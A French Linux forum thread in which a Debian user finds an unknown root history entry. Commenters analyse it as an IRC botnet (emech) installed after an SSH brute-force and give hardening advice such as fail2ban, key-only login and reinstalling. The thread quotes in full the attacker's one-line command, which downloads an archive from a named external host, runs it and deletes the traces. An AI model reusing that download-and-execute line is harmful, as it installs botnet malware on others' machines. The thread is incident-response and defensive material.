Forum Linux.debian/ubuntu étrange historique root

Posté par  .
Étiquettes : aucune
4
17
jan.
2011
Bonjour,

J'aimerais vous soumettre un petit problème : en recherchant dans mon historique (root sous debian), je suis tombé sur ça :

wget rocsana4u.webs.com/joke/emech.tgz;tar xvf emech.tgz;rm -rf emech.tgz;cd .joke;./start rdsnet;cd ..;rm -rf .joke

Chose dont je suis sûr n'avoir jamais tappée !!

Un petit google ne m'en apprend pas beaucoup, je suis donc persuadé d'avoir été victime d'intrusion.

J'ai donc imméditement changer mes mots de passe root et utilisateurs.

Cependant, en fouinant un peu, je suis tombé sur ça :
http://www.tux-planet.fr/local-root-exploit-linux-rds-protoc(...)
Est ce en lien ?

Sinon, comment savoir ce qu'a pu faire cette attaque (rien vu dans syslog , auth.log, ???)
Voici ce que j'ai trouvé :
Jan 16 04:32:23 monordi sshd[20758]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=francis.weppc.net  user=root
Jan 16 04:32:23 monordi sshd[20758]: pam_winbind(sshd:auth): getting password (0x00000388)
Jan 16 04:32:23 monordi sshd[20758]: pam_winbind(sshd:auth): pam_get_item returned a password
Jan 16 04:32:23 monordi sshd[20758]: pam_winbind(sshd:auth): request wbcLogonUser failed: WBC_ERR_AUTH_ERROR, PAM error: PAM_USER_UNKNOWN (10), NTSTATUS: NT_STATUS_NO_SUCH_USER, Error message was: No such user
Jan 16 04:32:25 monordi sshd[20758]: Failed password for root from 72.34.247.90 port 36132 ssh2
Jan 16 04:32:26 monordi sshd[20761]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=francis.weppc.net user=root
Jan 16 04:32:26 monordi sshd[20761]: pam_winbind(sshd:auth): getting password (0x00000388)
Jan 16 04:32:26 monordi sshd[20761]: pam_winbind(sshd:auth): pam_get_item returned a password
Jan 16 04:32:26 monordi sshd[20761]: pam_winbind(sshd:auth): request wbcLogonUser failed: WBC_ERR_AUTH_ERROR, PAM error: PAM_USER_UNKNOWN (10), NTSTATUS: NT_STATUS_NO_SUCH_USER, Error message was: No such user

Avec un scan sur un grand nombre de ports

En sachant que d'après cet historique celà date de ce week end.

Sinon, tout de suite, je vais régler mon iptables.

Merci à ceux qui auront l'amabilité de m'éclairer.

Chmanu
  • # analysons

    Posté par  . Évalué à 4.

    wget rocsana4u.webs.com/joke/emech.tgz
    tar xvf emech.tgz
    rm -rf emech.tgz
    cd .joke
    ./start rdsnet
    cd ..
    rm -rf .joke


    on comprend qu'il recupere un tgz, le decompresse (ce qui genererait un dossier .joke), puis supprime le tgz.

    il entre ensuite dans le dossier .joke
    et lance un script ./start rdsnet

    puis il ressort du dossier et le supprime

    il ne devrait donc plus y avoir que le process en memoire
    plus les fichiers que le process pourrait avoir generé.

    pour en savoir plus, tu peux telecharger le tgz toi aussi, le decompresser
    puis analyser plus finement ce que fait le script "start" quand on lui passe l'option "rdsnet"
    • [^] # Re: analysons

      Posté par  . Évalué à 2.

      Oui, merci, j'ai analysé ce que faisais ce script :
      première chose, il installe une crontab (toutes les minutes) celle était bien présente sur mon système. Ensuite un certain nombre de script se crée pour s'appeler.

      Il semblerait que ce soit une attaque ciblée sur nstld.verisign-grs.com. (j'ai fait un dig sur 5 adresses sur 20 d'un fichier, toutes indiquent ce domaine) pour deny de service des binaires sont présents, je ne sais donc pas ce qu'ils font.

      En tout cas, celà n'a pas du aller au bout car la crontab lance un script dans /root/.joke et ce répertoire n'existe pas (ls -alrt).

      Bon, je fais le ménage, mais reste vigilent.

      Merci.
      • [^] # Re: analysons

        Posté par  (site web personnel) . Évalué à 3.

        à première vue il va aller se connecter sur un salon IRC sur undernet, sûrement pour récupérer ton IP ou te controler (genre !attack france.fr). Regarde avec netstat si tu es connecté sur un serveur entre les ports 6660 et 7000
        • [^] # Re: analysons

          Posté par  . Évalué à 1.

          J'ai configuré iptables (en fait j'avais réinstallé ma machine il y a 2 semaines, j'ai un peu tardé avant de reconfigurer iptables et finalement, la nuit porte conseil ; surtout quand on reste éveillé ;-) )

          J'ai sauvé toutes mes logs pour voir à tête reposée, toujours est il que j'ai été victime de force brute, sachant qu'il s'agit juste d'un PC perso et que le mot de passe n'était pas alambiqué.

          Tout ce que j'ai de plus pour l'instant est que la cron tourne depuis hier 16:23. Je m'en suis donc aperçu (bêtement) relativement tôt (en retrant du boulot).
        • [^] # Re: analysons

          Posté par  . Évalué à -1.

          J'ai configuré iptables (en fait j'avais réinstallé ma machine il y a 2 semaines, j'ai un peu tardé avant de reconfigurer iptables et finalement, la nuit porte conseil ; surtout quand on reste éveillé ;-) )

          J'ai sauvé toutes mes logs pour voir à tête reposée, toujours est il que j'ai été victime de force brute, sachant qu'il s'agit juste d'un PC perso et que le mot de passe n'était pas alambiqué.

          Tout ce que j'ai de plus pour l'instant est que la cron tourne depuis hier 16:23. Je m'en suis donc aperçu (bêtement) relativement tôt (en retrant du boulot).
  • # Tu vas t'amuser !

    Posté par  (site web personnel) . Évalué à 2.

    Suis allé sur l'url en question et je me suis fait gentiment jeté par un warning HKTL_MECH...
    Un petit saut sur le net et voila les infos
    http://about-threats.trendmicro.com/Malware.aspx?language=us(...)

    A priori c'est pas du résident, mais rien ne prouve que du coup tu ne t'es pas fait ajouté d'autre saletés sur la machine... Par ailleurs la première choses est de commencer par trouver comment tu t'es fait défoncer le compte root !

    Ensuite l'idéal étant tout de même une réinstalle de machine si tu ne peux te le permettre ben sort l'artillerie lourde : chkrootkit, debsum, clamav...etc...

    Fuse : j'en Use et Abuse !

    • [^] # Re: Tu vas t'amuser !

      Posté par  . Évalué à 3.

      Moi je me suis pas fait jeter. (firefox)

      Le pid est sur:
      /tmp/.joke/m.pid

      Le nom du process est 'bash'

      Mais faut nettoyer le cron avant, la reference qui le réactive est "update"

      Par contre, comme bash est un executable, on sait pas ce qu'il a fait ailleurs.
    • [^] # Re: Tu vas t'amuser !

      Posté par  . Évalué à 9.

      La réinstall ce n'est pas "si on peut se le permettre", c'est juste obligatoire. On ne sait jamais ce qui peut trainer comme failles/rootkit/autres, même après un chkrootkit et tout le bazar.
      • [^] # Re: Tu vas t'amuser !

        Posté par  (site web personnel) . Évalué à 3.

        Tu prêche un converti....
        Mais la notion de "je peux pas me le permettre tout de suite" existe...
        Genre serveur en cours d'utilisation par un ou X client tiers, avec des applications dont tu n'as pas le MOP de réinstall disponible, des contraintes extérieures ....etc....

        Auquel cas tu fais le max de ménage, le max de blindage, de cloisonnement et tu planifies la réinstall ASAP en fonction des contraintes car tu peux pas kickstarter tout de suite...

        Fuse : j'en Use et Abuse !

  • # BotNet

    Posté par  . Évalué à 1.

    T'as la source... donc tu peux voir ce qu'il fait.

    Bienvenue dans un BotNet
    Le feedback est fait sur irc à son propriétaire.
    • [^] # Re: BotNet

      Posté par  . Évalué à 2.

      Pour info, il est aussi dans ton cron.
  • # Nouveau proverbe

    Posté par  . Évalué à 6.

    Il y a 2 sortes d'admins : ceux qui se sont fait défoncer le compte root et ceux qui vont se faire défoncer le compte root.
  • # on peut rajouter...

    Posté par  (site web personnel) . Évalué à 2.

    que c'est codé avec les orteils sales...
    • [^] # Re: on peut rajouter...

      Posté par  . Évalué à 2.

      Oui, ça ne fait même pas le ménage dans bash_history. Déçu.

      THIS IS JUST A PLACEHOLDER. YOU SHOULD NEVER SEE THIS STRING.

      • [^] # Re: on peut rajouter...

        Posté par  . Évalué à 3.

        Le poster initial est en fait le créateur du code et vous êtes en train de debuger son bouzin.
        • [^] # Re: on peut rajouter...

          Posté par  . Évalué à 2.

          C'est un plaisir d'aider :)

          THIS IS JUST A PLACEHOLDER. YOU SHOULD NEVER SEE THIS STRING.

  • # SSHd

    Posté par  . Évalué à 3.

    Si ça n'a pas été fait, tu devrais désactiver l'accès à une machine par SSH en utilisant le compte root. Ça élimine déjà pas mal d'attaques par force brutale.

    Enfin, dans tes règles iptables, tu peux mettre un ban de X minutes si une personne se trompe plusieurs fois de mot de passe. J'ai remarqué que c'était assez efficace.

    Bon, c'est peut-être pas par SSH que tu t'es fait trouer mais ce sont deux petites conseils que je peux te donner si tu ne les connais pas déjà.
    • [^] # Re: SSHd

      Posté par  . Évalué à 2.

      Plutot que désactiver root, désactiver juste le login par mdp pour root sécurise pas mal la chose :
      # tail -n 2 /etc/ssh/sshd_config
      Match User root
      PasswordAuthentication no
      • [^] # Re: SSHd

        Posté par  (site web personnel) . Évalué à 4.

        Je pense que le mieux reste de n'autoriser qu'un seul utilisateur via AllowedUsers, ca évite les eventuelles bourdes ultérieures..

        Sinon, fail2ban (ssh, apache, ...) fait du bon boulot pour bloquer tout activité suspecte.
        • [^] # Re: SSHd

          Posté par  . Évalué à 3.

          Je confirme, me suis fait avoir par un compte "invite/invite" ajouté à l'arrach' sur une machine qui faisait serveur mais aussi desktop.

          "Bouge pas, je crée un compte pour les amis de passage comme toi, ça t'évitera de te battre avec Noscript quand t'iras sur Facebook."

          Et deux mois plus tard:

          "Ho ben ça alors, quelqu'un est entré par le SSH!"

          THIS IS JUST A PLACEHOLDER. YOU SHOULD NEVER SEE THIS STRING.

    • [^] # Re: SSHd

      Posté par  . Évalué à 3.

      En complément à ce qui vient d'être dit, la bonne vieille astuce qui consiste à déplacer sshd du port 22 vers un port plus exotique est souveraine. D'ailleurs je ne me souviens pas avoir vu de force brute sur le SSH depuis que j'ai pris cette habitude.
      • [^] # Re: SSHd

        Posté par  . Évalué à 3.

        fail2ban me donne une certaine tranquilité, et avec un plus non négligeable; certains proxy bloquent les ports exotiques (bon d'autre bloquent le port 22... suffit de s'adapter ^^)

        Il ne faut pas décorner les boeufs avant d'avoir semé le vent

        • [^] # Re: SSHd

          Posté par  (site web personnel) . Évalué à 1.

          Pour en remettre une couche, un système durçi bien configuré permet de tracer ( audit ) les actions effectuées.( ssh bien configuré ( pas de connexion en root par mdp + fail2ban + firewall ). Une sauvegarde peut être utile, ça permet un gain de temps non négligeable au lieu de tout réinstaller.

          Système - Réseau - Sécurité Open Source

    • [^] # Re: SSHd

      Posté par  (site web personnel) . Évalué à 1.

      Si cela est faisable pour toi, tu peux aussi désactiver l'authentification ssh par mots de passe et n'autoriser que les clefs. Depuis que je fais cela, je dors plus serein!

      Évidement, il faut alors toujours avoir sa clef ssh avec soi pour pouvoir se connecter...

Suivre le flux des commentaires

Note : les commentaires appartiennent à celles et ceux qui les ont postés. Nous n’en sommes pas responsables.